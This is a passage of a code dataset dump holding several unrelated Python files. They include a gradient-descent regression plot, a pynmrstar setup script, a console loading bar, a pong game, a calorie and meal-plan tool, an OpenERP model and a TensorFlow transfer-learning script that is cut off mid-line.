tot_slope, tot_intercept, tot_ssr, learning_rate\r\n\r\nslope, intercept, gradient_slope, gradient_intercept, tot_gradient_slope, tot_gradient_intercept, tot_slope, tot_intercept, tot_ssr, learning_rate = gradient_descent(x, y, slope, intercept, learning_rate, minimum_gradient, maximum_iterations, mini_batch)\r\n\r\n#linear regression line\r\nmodel_x = np.arange((min(x) - (min(x) / 10)), (max(x) + (max(x) / 10)), (len(x) / 100))\r\nmodel_y = (slope * model_x) + intercept\r\ny_pred = (slope * x) + intercept\r\n\r\neq = \"Predicted Line: Y = (\" + str(np.around(slope, 3)) + \")\" + \"X\" + \" + \" + \"(\" + str(np.around(intercept, 3)) + \")\"\r\n\r\n#correlation actual y against predicted y\r\nr = np.corrcoef(y, y_pred)[0, 1]\r\n\r\n#plotting\r\nfont1 = {\"family\":\"serif\",\"color\":\"#1D1D1D\",\"size\":14}\r\nfont2 = {\"family\":\"serif\",\"color\":\"#1D1D1D\",\"size\":12}\r\n\r\nplt.subplot(2, 2, 1)\r\nplt.plot(np.arange(0, len(tot_gradient_slope)), tot_gradient_slope, label = \"The Gradient of The SSR The Slope\", c = \"crimson\")\r\nplt.plot(np.arange(0, len(tot_gradient_intercept)), tot_gradient_intercept, label = \"The Gradient of The SSR and The Intercept\", c = \"midnightblue\")\r\nplt.plot(np.arange(0, len(tot_ssr)), tot_ssr, label = \"The Sum of Square Residual (SSR)\", c = \"forestgreen\")\r\nplt.legend(loc = \"lower right\")\r\nplt.xlabel(\"Number of Iterations\", fontdict = font2)\r\nplt.ylabel(\"Amplitude\", fontdict = font2)\r\nplt.title((\"(Number of Iteration, Amplitude) \" + \", alpha: \" + str(learning_rate)), fontdict = font1)\r\nplt.grid()\r\n\r\nplt.subplot(2, 2, 2)\r\nplt.scatter(np.arange(0, len(tot_slope)), tot_slope, label = \"The Slope\", c = \"red\")\r\nplt.scatter(np.arange(0, len(tot_intercept)), tot_intercept, label = \"The Intercept\", c = \"blue\")\r\nplt.legend(loc = \"lower right\")\r\nplt.xlabel(\"Number of Iterations\", fontdict = font2)\r\nplt.ylabel(\"Amplitude\", fontdict = font2)\r\nplt.title((\"(Number of Iteration, Amplitude) \" + \", alpha: \" + str(learning_rate)), fontdict = font1)\r\nplt.grid()\r\n\r\nplt.subplot(2, 2, 3)\r\nplt.scatter(x, y, label = \"Data\", c = \"dodgerblue\")\r\nplt.plot(model_x, model_y, label = eq, c = \"black\")\r\nplt.plot(model_x, model_y_initial, label = eq_initial, c = \"red\")\r\nplt.legend(loc = \"lower right\")\r\nplt.xlabel(label_x, fontdict = font2)\r\nplt.ylabel(label_y, fontdict = font2)\r\nplt.title((\"(\" + label_x + \", \" + label_y + \")\"), fontdict = font1)\r\nplt.grid()\r\n\r\nplt.subplot(2, 2, 4)\r\nplt.scatter(y, y_pred, c = \"dodgerblue\")\r\nplt.xlabel((\"Actual \" + label_y), fontdict = font2)\r\nplt.ylabel((\"Predicted \" + label_y), fontdict = font2)\r\nplt.title((\"(Actual \" + label_y + \", \" + \"Predicted \" + label_y + \")\" + \", r = \" + str(np.around(r, 3))), fontdict = font1)\r\nplt.grid()\r\n\r\nplt.subplots_adjust(hspace = 0.5)\r\n\r\nif str(gradient_slope) == \"nan\" or str(gradient_intercept) == \"nan\" :\r\n print(\"\\n\", \"Plot cannot be done . . .\")\r\nelse :\r\n plt.show()\r\n\r\nprint(\"\\n\")","sub_path":"mini_batch_stochastic_gradient_decent_ssr_linear_regression.py","file_name":"mini_batch_stochastic_gradient_decent_ssr_linear_regression.py","file_ext":"py","file_size_in_byte":7588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"627270031","text":"try:\n from setuptools import setup, Extension\nexcept ImportError:\n from distutils.core import setup, Extension\n\nfrom pynmrstar import __version__\n\ncnmrstar = Extension('cnmrstar',\n sources=['c/cnmrstarmodule.c'],\n extra_compile_args=[\"-funroll-loops\", \"-O3\"],\n optional=True)\n\ntry:\n long_description = open('README.md', 'r').read()\nexcept IOError:\n long_description = open('pynmrstar/README.md', 'r').read()\n\nsetup(name='pynmrstar',\n version=__version__,\n packages=['pynmrstar'],\n ext_modules=[cnmrstar],\n author='Jon Wedell',\n author_email='wedell@bmrb.wisc.edu',\n description='PyNMR-STAR provides tools for reading, writing, modifying, and interacting with NMR-STAR files. '\n 'Maintained by the BMRB.',\n long_description=long_description,\n long_description_content_type='text/markdown',\n keywords=['bmrb', 'parser', 'nmr', 'nmrstar', 'biomagresbank', 'biological magnetic resonance bank'],\n url='https://github.com/uwbmrb/PyNMRSTAR',\n license='MIT',\n package_data={\n 'pynmrstar': ['reference_files/schema.csv', 'reference_files/comments.str', 'reference_files/data_types.csv',\n '.nocompile', 'README.md']},\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Environment :: Console',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.6',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: GNU General Public License (GPL)',\n 'Natural Language :: English',\n 'Operating System :: MacOS',\n 'Operating System :: POSIX :: Linux',\n 'Topic :: Scientific/Engineering :: Bio-Informatics',\n 'Topic :: Software Development :: Libraries',\n 'Topic :: Software Development :: Libraries :: Python Modules'\n ]\n )\n","sub_path":"pypi_install_script/pynmrstar-2.6.5.1.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"226445359","text":"import time\nimport random\nfrom os import system, name\n\n#################\n# @AntoSoulaire #\n#################\n\n# Initialisation du tableau qui se mettra à jour en fonction du chargement\nbar = []\n\n# Remplissage du tableau par 20 valeurs vides (qui se rempliront donc tous les 5%)\nfor i in range(20):\n bar.append('')\n\n# Choix d'un nombre aléatoire qui servira de référence pour la barre de chargement\nran = random.randint(4, 10) * 10\n\n# Boucle de chargement (en fonction de la valeur aléatoire ci-dessus)\nfor i in range(ran):\n\n # On met à jour le % d'avancement 4 fois par seconde\n time.sleep(0.25)\n pourc = ((i+1)/ran) * 100\n\n # On regarde la valeur 'pourc', tous les 5% on met à jour l'une des cases vides du tableau 'bar'\n for x in range(len(bar)):\n if ((x + 1) * 5) <= pourc:\n # (On remplace '' par '█'\n bar[x] = '█'\n\n # La valeur 'load' servira à afficher la tableau 'bar' sous forme de string\n load = \"\"\n for x in range(len(bar)):\n load += bar[x]\n\n # Clear le terminal afin de n'avoir qu'une seule barre de chargement, au lieu de 4 / seconde\n # Note : Fonctionne dans l'invite de commandes, mais pas dans la console de certains IDE\n if name == 'nt':\n system('cls')\n else:\n system('clear')\n\n # [Esthétique] Permet de toujours avoir 4 chiffres affichés (par exemple 1.250 ou 15.00 ou 100.0)\n pourc = str(float(int(pourc * 100))/100)\n if len(pourc) < 5:\n if pourc[1] == '.':\n pourc = \"0\" + pourc\n else:\n pourc += \"0\"\n if len(pourc) < 5:\n pourc = \"0\" + pourc\n\n # Affichage final\n print(pourc + \"% \" + load)\n","sub_path":"Loading_v1.py","file_name":"Loading_v1.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"23462170","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport pygame\nimport pandas as pd\n\n# variables\nWIDTH = 1200\nHEIGHT = 600\nBORDER = 20\nVELOCITY = 4\nFRAMERATE = 320\n\n# classes\nclass Ball:\n RADIUS = 20\n \n def __init__(self,x,y,vx,vy):\n self.x = x\n self.y = y\n self.vx = vx\n self.vy = vy\n \n def show(self, colour):\n pygame.draw.circle(screen, colour, (self.x, self.y), self.RADIUS)\n \n def update(self):\n newx = self.x + self.vx\n newy = self.y + self.vy\n \n if newx < BORDER+self.RADIUS:\n self.vx = -self.vx\n elif newy < BORDER+self.RADIUS or newy > HEIGHT-BORDER-self.RADIUS:\n self.vy = -self.vy\n elif newx+Ball.RADIUS > WIDTH-Paddle.WIDTH \\\n and abs(newy-paddle.y) < Paddle.HEIGHT//2:\n self.vx = -self.vx\n else:\n self.show(bgColor)\n self.x = newx\n self.y = newy\n self.show(fgColor)\n \nclass Paddle: \n WIDTH = 50\n HEIGHT = 100\n \n def __init__(self,y):\n self.y = y\n \n def show(self,colour):\n pygame.draw.rect(screen, colour, \n pygame.Rect(WIDTH-self.WIDTH, \n self.y-self.HEIGHT//2, \n self.WIDTH, self.HEIGHT))\n \n def update(self): \n newy = pygame.mouse.get_pos()[1]\n if newy-self.HEIGHT//2>BORDER \\\n and newy+self.HEIGHT//2BORDER \\\n and newy+self.HEIGHT//2 100: # Users age,\n user_age = input(\"Enter your age [1-100]: \")\n while int(user_weight) <= 0 or int(user_weight) > 500: # Users weight,\n user_weight = input(\"Enter your weight(kg)[1-500]: \")\n while int(user_height) <= 0 or int(user_height) > 300: # Users height,\n user_height = input(\"Enter your height(cm)[1-300]: \")\n\n # K - Physical activity rate\n\n while int(user_activity_group) <= 0 or int(user_activity_group) > 5: # Users activity group;\n user_activity_group = input(\"[1] - Little to no exercise,\\n[2] - Light exercise (1-3 days per week),\\n[3] - Moderate exercise (3-5 days per week),\\n[4] - Heavy exercise (6-7 days per week).\\n[5] - Very heavy exercise (6-7 days per week)\\nEnter your activity level(Type number from the options above that fits you best): \")\n if user_activity_group == \"1\":\n K = 1.2\n elif user_activity_group == \"2\":\n K = 1.375\n elif user_activity_group == \"3\":\n K = 1.55\n elif user_activity_group == \"4\":\n K = 1.75\n elif user_activity_group == \"5\":\n K = 1.9\n\n # BMI - Body Mass Index\n\n BMI = int(user_weight) / ((int(user_height) / 100) * (int(user_height) / 100)) # Calculating users BMI\n\n # BMR - Basal Metabolic Rate\n\n if user_gender == \"1\":\n BMR = 655 + (9.6 * float(user_weight)) + (1.8 * float(user_height)) - (4.7 * float(user_age)) # Calculating BMR and daily calories intake depending on users gender.\n daily_calories_intake = float(BMR) * float(K)\n elif user_gender == \"2\":\n BMR = 66.5 + (13.75 * float(user_weight)) + (5.0 * float(user_height)) - (6.8 * float(user_age))\n daily_calories_intake = float(BMR) * float(K)\n\n # Storing the information to \"register.json\" file\n\n user_data[user_ID] = [user_gender, user_age, user_weight, user_height, BMI, K, BMR, daily_calories_intake]\n with open(\"register.json\", 'w') as reg:\n json.dump(user_data, reg)\n\n print(\"-------------------------------------------\")\n while not choice == \"1\" or choice == \"Q\":\n choice = input(\"[1]. Go back to the menu.\\n[Q]. Quit the program.\\nChoose your next action: \")\n if choice == \"1\":\n menu_after_login(user_ID)\n elif choice == \"Q\":\n exit()\n\n# Login function which allows to log in or warn that such account does not exist.\n\ndef login():\n user_ID = input(\"Enter your personal number (ID): \")\n user_data = json.load(open(\"register.json\"))\n if user_ID in user_data:\n print(\"You have successfully logged in!\")\n menu_after_login(user_ID)\n else:\n print(\"Seems that such ID does not exist.\")\n menu()\n\n# A menu that follows user after his every action.\n\ndef menu_after_login(user_ID):\n choice = 0\n print(\"----------------------------------------\")\n while not choice in [1,2,3,4] or choice == \"Q\":\n print(\"[1]. Show current information about you.\\n[2]. Edit your information.\\n[3]. Generate week meal plan.\\nType [Q] to quit the program: \")\n choice = input(\"Select your action [1-3] or [Q]: \")\n if choice == \"1\":\n user_info(user_ID)\n elif choice == \"2\":\n edit_user_info(user_ID)\n elif choice == \"3\":\n meal_plan(user_ID)\n elif choice == \"Q\":\n exit()\n else:\n print(\"There is no such option. Try again.\")\n\n# Function used to output collected information about user.\n\ndef user_info(user_ID):\n choice = 0\n user_data = json.load(open(\"register.json\"))\n divider()\n if user_data[user_ID][0] == \"1\":\n print(\"Gender: Female\")\n else:\n print(\"Gender: Male\")\n print((\"Age: {}\").format(user_data[user_ID][1]))\n print((\"Weight: {} kg\").format(user_data[user_ID][2]))\n print((\"Height: {} cm\").format(user_data[user_ID][3]))\n print((\"BMI: {} [Body Mass Index]\").format(round(user_data[user_ID][4], 2)))\n print((\"K: {} [Physical activity rate]\").format(user_data[user_ID][5]))\n print((\"BMR: {} [Basal Metabolic Rate]\").format(user_data[user_ID][6]))\n print((\"Recommended daily caloric intake: {}\").format(user_data[user_ID][7]))\n divider()\n while not choice == \"1\" or choice == \"Q\":\n choice = input(\"[1]. Go back to the menu.\\n[Q]. Quit the program.\\nChoose your next action: \")\n if choice == \"1\":\n menu_after_login(user_ID)\n elif choice == \"Q\":\n exit()\n\n# Function used to change the information about user.\n# Changes are associated with one another. I.E. if user has changed his age,\n# the program will also change recommended daily calories intake, etc.\n\ndef edit_user_info(user_ID):\n user_data = json.load(open(\"register.json\"))\n choice = 0\n choice_inside_ifs = 0\n user_input = 0\n while not choice in [1,2,3,4] or choice == \"Q\":\n divider()\n print(\"[1]. Age.\\n[2]. Weight.\\n[3]. Height.\\n[4]. K.\\n[Q] to quit the program.\")\n choice = input(\"Select your action [1-5]: \")\n if choice == \"1\": # Changes if user has decided to change his age.\n user_input = input(\"Enter your age: \")\n user_data[user_ID][1] = user_input\n if_male_female_change(user_data, user_ID)\n with open(\"register.json\", 'w') as c:\n json.dump(user_data, c)\n print(\"You have successfully changed your age!\")\n menu_after_login(user_ID)\n elif choice == \"2\": # Changes if user has decided to change his weight.\n user_input = input(\"Enter your weight: \")\n user_data[user_ID][2] = user_input\n user_data[user_ID][4] = int(user_data[user_ID][2]) / ((int(user_data[user_ID][3]) / 100) * (int(user_data[user_ID][3]) / 100))\n if_male_female_change(user_data, user_ID)\n with open(\"register.json\", 'w') as c:\n json.dump(user_data, c)\n print(\"You have successfully changed your weight!\")\n menu_after_login(user_ID)\n elif choice == \"3\": # Changes if user has decided to change his height.\n user_input = input(\"Enter your height: \")\n user_data[user_ID][3] = user_input\n user_data[user_ID][4] = int(user_data[user_ID][2]) / ((int(user_data[user_ID][3]) / 100) * (int(user_data[user_ID][3]) / 100))\n if_male_female_change(user_data, user_ID)\n with open(\"register.json\", 'w') as c:\n json.dump(user_data, c)\n print(\"You have successfully changed your height!\")\n menu_after_login(user_ID)\n elif choice == \"4\": # Changes if user has decided to change his physical activity rate.\n while int(user_input) <= 0 or int(user_input) > 5:\n user_input = input(\"[1] - Little to no exercise,\\n[2] - Light exercise (1-3 days per week),\\n[3] - Moderate exercise (3-5 days per week),\\n[4] - Heavy exercise (6-7 days per week).\\n[5] - Very heavy exercise (6-7 days per week)\\nEnter your activity level(Type number from the options above that fits you best): \")\n if user_input == \"1\":\n user_data[user_ID][5] = 1.2\n elif user_input == \"2\":\n user_data[user_ID][5] = 1.375\n elif user_input == \"3\":\n user_data[user_ID][5] = 1.55\n elif user_input == \"4\":\n user_data[user_ID][5] = 1.75\n elif user_input == \"5\":\n user_data[user_ID][5] = 1.9\n if_male_female_change(user_data, user_ID)\n with open(\"register.json\", 'w') as c: # Storing changed information back to the file.\n json.dump(user_data, c)\n print(\"You have successfully changed your activity group!\")\n menu_after_login(user_ID)\n elif choice == \"Q\":\n exit()\n else:\n print(\"There is no such option. Try again.\")\n\n# Since changes are associated with one another, this function depending on the gender\n# calculates BMR and daily caloric intake.\n\ndef if_male_female_change(user_data, user_ID):\n if user_data[user_ID][0] == \"1\":\n user_data[user_ID][6] = 655 + (9.6 * float(user_data[user_ID][2])) + (1.8 * float(user_data[user_ID][3])) - (4.7 * float(user_data[user_ID][1]))\n user_data[user_ID][7] = float(user_data[user_ID][6]) * float(user_data[user_ID][5])\n elif user_data[user_ID][0] == \"2\":\n user_data[user_ID][6] = 66.5 + (13.75 * float(user_data[user_ID][2])) + (5.0 * float(user_data[user_ID][3])) - (6.8 * float(user_data[user_ID][1]))\n user_data[user_ID][7] = float(user_data[user_ID][6]) * float(user_data[user_ID][5])\n return user_data\n\n# Recommendations for splitting calories throughout the day are:\n# 32,5% of the calories for breakfast, 37,5% for lunch, 30% for dinner.\n# By following these recommendations program will divide the chosen calories amount for these three meals.\n\ndef meal_plan(user_ID):\n option = input(\"Would you like to use your calories recommendation (1) for the plan or would you like to enter your own calorie amount for the day (2)?\\nEnter: \")\n if int(option) == 1:\n with open(\"register.json\", 'r') as cal:\n data = json.load(cal)\n calories = data[user_ID][7]\n else:\n calories = input(\"Enter your daily caloric intake: \")\n\n for_breakfast = (int(calories) * 32.5) / 100\n for_lunch = (int(calories) * 37.5) / 100\n for_dinner = (int(calories) * 30) / 100\n divider()\n print(\"For breakfast:\")\n day_plan(for_breakfast)\n print(\"For lunch:\")\n day_plan(for_lunch)\n print(\"For dinner:\")\n day_plan(for_dinner)\n\n# Finding the closest amount of calories to the recommendation and\n# printing out the recipe name, calories, carbs, fats and proteins.\n\ndef day_plan(calories):\n cal_array = []\n recipes = json.load(open(\"recipes.json\"))\n for key in recipes:\n cal_array.append(recipes[key][0])\n closest = cal_array[min(range(len(cal_array)), key = lambda i: abs(cal_array[i]-calories))]\n\n for key in recipes:\n if recipes[key][0] == closest:\n divider()\n print((\" Recipe: {}.\").format(key))\n print((\" Calories: {}.\").format(recipes[key][0]))\n print((\" Carbs: {}.\").format(recipes[key][1]))\n print((\" Fats: {}.\").format(recipes[key][2]))\n print((\" Proteins: {}.\").format(recipes[key][3]))\n divider()\n\ndef divider():\n print(\"-------------------------\")\n\nmenu()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"251798794","text":"#-*- coding: utf-8 -*-\n\nfrom openerp.osv import fields, osv\n\nclass Escolaridad(osv.Model):\n\t_name = \"cein.escolaridad\"\n\t_columns = {\n\t\t'name': fields.char(string=\"Nombre\",\t size=256, required=True,help=\"Nombre sin acentos opcionalmente para optimizar busquedas\"),\n\t\t'displayname': fields.char(string=\"Display Nombre\",\t size=256, required=True,help=\"Nombre con acentos a mostrar\"),\n\t\t'codlegado': fields.integer('Codigo Legado',required=True, help=\"Codigo legado\"),\n\t\t'activo': fields.boolean(\"Activado\"),\n\t\t'descripcion': fields.text(\"Description\", required=False, help=\"Descripcion\"),\n\t}\n\t_defaults = {\n\t\t'activo': True,\t\n\t}\n\n\t_sql_constraints = [\n\t('cod_legado_unique',\t\n\t'UNIQUE(codlegado)',\n\t'íNo se permite duplicar ID legados!'),\n\t('name_unique',\t\n\t'UNIQUE(name)',\n\t'íNo se permite duplicar Nombre!'),\n\t('displayname_unique',\t\n\t'UNIQUE(displayname)',\n\t'íNo se permite duplicar displayname!'),\n]","sub_path":"model/escolaridad.py","file_name":"escolaridad.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"73121507","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 24 00:54:22 2018\n\n@author: Ze\n\"\"\"\nimport time\n\ntime1 = time.time()\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib as mlp\nimport tensorflow as tf\nimport os\n\n\ndef read_and_decode(filename):\n filename_queue = tf.train.string_input_producer([filename])\n\n reader = tf.TFRecordReader()\n _, serialized_example = reader.read(filename_queue)\n features = tf.parse_single_example(serialized_example,\n features={\n 'label': tf.FixedLenFeature([], tf.int64),\n 'image_raw': tf.FixedLenFeature([], tf.string),\n })\n\n img = tf.decode_raw(features['image_raw'], tf.uint8)\n img = tf.reshape(img, [240, 240, 3])\n\n # img = tf.cast(img, tf.float32) * (1. / 255) - 0.5\n # img = tf.reshape(img, [14400])\n label = tf.cast(features['label'], tf.int64)\n\n return img, label\n\n\ndef get_batch(image, label, batch_size):\n images, label_batch = tf.train.shuffle_batch([image, label], batch_size=batch_size,\n capacity=3000, min_after_dequeue=200)\n\n return images, tf.reshape(label_batch, [batch_size])\n\n\nclass Network(object):\n def __init__(self, learning_rate, batch):\n self.learning_rate = learning_rate\n self.batch_size = batch\n with tf.variable_scope(\"weights\"):\n self.weights = {\n 'conv1': tf.get_variable('conv1', [3, 3, 3, 16],\n initializer=tf.contrib.layers.xavier_initializer_conv2d()),\n 'conv2': tf.get_variable('conv2', [3, 3, 16, 32],\n initializer=tf.contrib.layers.xavier_initializer_conv2d()),\n 'conv3': tf.get_variable('conv3', [3, 3, 32, 64],\n initializer=tf.contrib.layers.xavier_initializer_conv2d()),\n 'conv4': tf.get_variable('conv4', [3, 3, 64, 128],\n initializer=tf.contrib.layers.xavier_initializer_conv2d()),\n 'conv5': tf.get_variable('conv5', [3, 3, 128, 64],\n initializer=tf.contrib.layers.xavier_initializer_conv2d()),\n 'fc1': tf.get_variable('fc1', [7 * 7 * 64, 1024],\n initializer=tf.contrib.layers.xavier_initializer()),\n 'fc2': tf.get_variable('fc2', [1024, 24],\n initializer=tf.contrib.layers.xavier_initializer()),\n }\n with tf.variable_scope(\"biases\"):\n self.biases = {\n 'conv1': tf.get_variable('conv1', [16, ],\n initializer=tf.constant_initializer(value=0.0, dtype=tf.float32)),\n 'conv2': tf.get_variable('conv2', [32, ],\n initializer=tf.constant_initializer(value=0.0, dtype=tf.float32)),\n 'conv3': tf.get_variable('conv3', [64, ],\n initializer=tf.constant_initializer(value=0.0, dtype=tf.float32)),\n 'conv4': tf.get_variable('conv4', [128, ],\n initializer=tf.constant_initializer(value=0.0, dtype=tf.float32)),\n 'conv5': tf.get_variable('conv5', [64, ],\n initializer=tf.constant_initializer(value=0.0, dtype=tf.float32)),\n 'fc1': tf.get_variable('fc1', [1024, ],\n initializer=tf.constant_initializer(value=0.0, dtype=tf.float32)),\n 'fc2': tf.get_variable('fc2', [24, ],\n initializer=tf.constant_initializer(value=0.0, dtype=tf.float32))\n }\n\n def inference(self, images):\n with tf.name_scope(name='inference'):\n images = tf.reshape(images, shape=[-1, 240, 240, 3])\n images = (tf.cast(images, tf.float32) / 255. - 0.5) * 2\n\n conv1 = tf.nn.bias_add(tf.nn.conv2d(images, self.weights['conv1'], strides=[1, 1, 1, 1], padding='SAME'),\n self.biases['conv1'])\n bn1 = tf.layers.batch_normalization(conv1)\n relu1 = tf.nn.relu(bn1)\n pool1 = tf.nn.max_pool(relu1, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='VALID')\n\n conv2 = tf.nn.bias_add(tf.nn.conv2d(pool1, self.weights['conv2'], strides=[1, 1, 1, 1], padding='SAME'),\n self.biases['conv2'])\n bn2 = tf.layers.batch_normalization(conv2)\n relu2 = tf.nn.relu(bn2)\n pool2 = tf.nn.max_pool(relu2, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='VALID')\n\n conv3 = tf.nn.bias_add(tf.nn.conv2d(pool2, self.weights['conv3'], strides=[1, 1, 1, 1], padding='SAME'),\n self.biases['conv3'])\n bn3 = tf.layers.batch_normalization(conv3)\n relu3 = tf.nn.relu(bn3)\n pool3 = tf.nn.max_pool(relu3, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='VALID')\n\n conv4 = tf.nn.bias_add(tf.nn.conv2d(pool3, self.weights['conv4'], strides=[1, 1, 1, 1], padding='SAME'),\n self.biases['conv4'])\n bn4 = tf.layers.batch_normalization(conv4)\n pool4 = tf.nn.max_pool(bn4, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='VALID')\n\n conv5 = tf.nn.bias_add(tf.nn.conv2d(pool4, self.weights['conv5'], strides=[1, 2, 2, 1], padding='VALID'),\n self.biases['conv5'], name='layer_conv5')\n bn5 = tf.layers.batch_normalization(conv5)\n flatten = tf.reshape(bn5, [-1, self.weights['fc1'].get_shape().as_list()[0]])\n # dropout 正则化\n drop1 = tf.nn.dropout(flatten, 0.5)\n fc1 = tf.nn.bias_add(tf.matmul(drop1, self.weights['fc1']), self.biases['fc1'], name='layer_fc1')\n fc_relu1 = tf.nn.relu(fc1)\n fc2 = tf.nn.bias_add(tf.matmul(fc_relu1, self.weights['fc2']), self.biases['fc2'], name='layer_fc2')\n\n return fc2\n\n def inference_fc1(self, images):\n with tf.name_scope(name='inference_fc1'):\n images = tf.reshape(images, shape=[-1, 240, 240, 3])\n images = (tf.cast(images, tf.float32) / 255. - 0.5) * 2\n\n conv1 = tf.nn.bias_add(tf.nn.conv2d(images, self.weights['conv1'], strides=[1, 1, 1, 1], padding='SAME'),\n self.biases['conv1'])\n bn1 = tf.layers.batch_normalization(conv1)\n relu1 = tf.nn.relu(bn1)\n pool1 = tf.nn.max_pool(relu1, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='VALID')\n\n conv2 = tf.nn.bias_add(tf.nn.conv2d(pool1, self.weights['conv2'], strides=[1, 1, 1, 1], padding='SAME'),\n self.biases['conv2'])\n bn2 = tf.layers.batch_normalization(conv2)\n relu2 = tf.nn.relu(bn2)\n pool2 = tf.nn.max_pool(relu2, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='VALID')\n\n conv3 = tf.nn.bias_add(tf.nn.conv2d(pool2, self.weights['conv3'], strides=[1, 1, 1, 1], padding='SAME'),\n self.biases['conv3'])\n bn3 = tf.layers.batch_normalization(conv3)\n relu3 = tf.nn.relu(bn3)\n pool3 = tf.nn.max_pool(relu3, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='VALID')\n\n conv4 = tf.nn.bias_add(tf.nn.conv2d(pool3, self.weights['conv4'], strides=[1, 1, 1, 1], padding='SAME'),\n self.biases['conv4'])\n bn4 = tf.layers.batch_normalization(conv4)\n pool4 = tf.nn.max_pool(bn4, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='VALID')\n\n conv5 = tf.nn.bias_add(tf.nn.conv2d(pool4, self.weights['conv5'], strides=[1, 2, 2, 1], padding='VALID'),\n self.biases['conv5'], name='layer_conv5')\n bn5 = tf.layers.batch_normalization(conv5)\n flatten = tf.reshape(bn5, [-1, self.weights['fc1'].get_shape().as_list()[0]])\n # dropout 正则化\n drop1 = tf.nn.dropout(flatten, 0.5)\n fc1 = tf.nn.bias_add(tf.matmul(drop1, self.weights['fc1']), self.biases['fc1'], name='layer_fc1')\n\n return fc1\n\n def sorfmax_loss(self, predicts, labels):\n labels = tf.one_hot(labels, self.weights['fc2'].get_shape().as_list()[1]) # as——list得到第二个维度(2分类为2)\n loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits_v2(logits=predicts, labels=labels))\n self.cost = loss\n return self.cost\n\n def optimer(self, loss):\n global_step = tf.Variable(0)\n learning_rate = tf.train.exponential_decay(self.learning_rate, global_step,\n decay_steps=50, decay_rate=0.9,\n staircase=True)\n train_optimizer = tf.train.AdamOptimizer(learning_rate).minimize(loss)\n return train_optimizer\n\n\ndef transfer_inference(input, num_class):\n with tf.name_scope(name=\"transfer_layer1\"):\n weights = tf.get_variable(shape=[1024, 64], name=\"layer1_w\")\n bias = tf.get_variable(shape=[64, ], name=\"layer1_b\")\n fc_layer1 = tf.nn.relu(tf.add(tf.matmul(input, weights), bias), name=\"fc_layer1\")\n # with tf.name_scope(name=\"transfer_layer2\"):\n # weights = tf.get_variable(shape=[128, 64], name=\"layer2_w\")\n # bias = tf.get_variable(shape=[64, ], name=\"layer2_b\")\n # fc_layer2 = tf.nn.relu(tf.add(tf.matmul(fc_layer1, weights), bias), name=\"fc_layer2\")\n with tf.name_scope(name=\"transfer_layer3\"):\n weights = tf.get_variable(shape=[64, num_class], name=\"layer3_w\")\n bias = tf.get_variable(shape=[num_class, ], name=\"layer3_b\")\n fc_layer3 = tf.add(tf.matmul(fc_layer1, weights), bias, name=\"y_pred\")\n return fc_layer3\n\n\ndef compute_loss(y_pred, y_true, num_class):\n labels = tf.one_hot(y_true, num_class)\n loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits_v2(labels=labels, logits=y_pred))\n return loss\n\n\ndef train(lr=0.0001, epochs=1000):\n tf.reset_default_graph()\n net = Network(0.0001, 64)\n # inference and calculate the accuracy in train data\n with tf.name_scope('input'):\n x = tf.placeholder(tf.float32, [net.batch_size, 240, 240, 3], name='x')\n y = tf.placeholder(tf.int64, [net.batch_size, ], name='y')\n layer_fc1 = net.inference_fc1(x)\n\n feature_layer = tf.stop_gradient(layer_fc1)\n y_pred = transfer_inference(feature_layer, num_class=10)\n loss = compute_loss(y_pred, y, num_class=10)\n tf.summary.scalar(\"loss\", loss)\n train_step = tf.train.AdamOptimizer(lr).minimize(loss)\n correct_pred = tf.equal(tf.argmax(y_pred, 1), y)\n train_acc = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n tf.summary.scalar(\"accuracy\", train_acc)\n\n data_path = \"casy_test_data_10class.tfrecords\"\n # data_path = \"tongji_test_data_rpm1000.tfrecords\"\n # data_path = \"tongji_data_4_class_diff_rpm_test.tfrecords\"\n train_image, train_label = read_and_decode(data_path)\n train_batch_image, train_batch_label = get_batch(train_image, train_label, batch_size=64)\n\n test_image, test_label = read_and_decode(data_path)\n test_batch_image, test_batch_label = get_batch(test_image, test_label, batch_size=64)\n merged = tf.summary.merge_all()\n # saver = tf.train.Saver()\n ckpt = tf.train.get_checkpoint_state('./model/0.0001_64/')\n # 只加载conv部分参数,其他参数初始化\n var = tf.global_variables()\n var_to_restore = [val for val in var if 'conv' in val.name]\n # var_to_restore = [val for val in var if 'conv1' in val.name or 'conv2' in val.name or 'conv3' in val.name]\n saver = tf.train.Saver(var_to_restore)\n var_to_init = [val for val in var if 'conv' not in val.name]\n tf.variables_initializer(var_to_init)\n train_costs = []\n train_accs = []\n test_accs = []\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n with tf.Session(config=config) as sess:\n # saver.restore(sess, 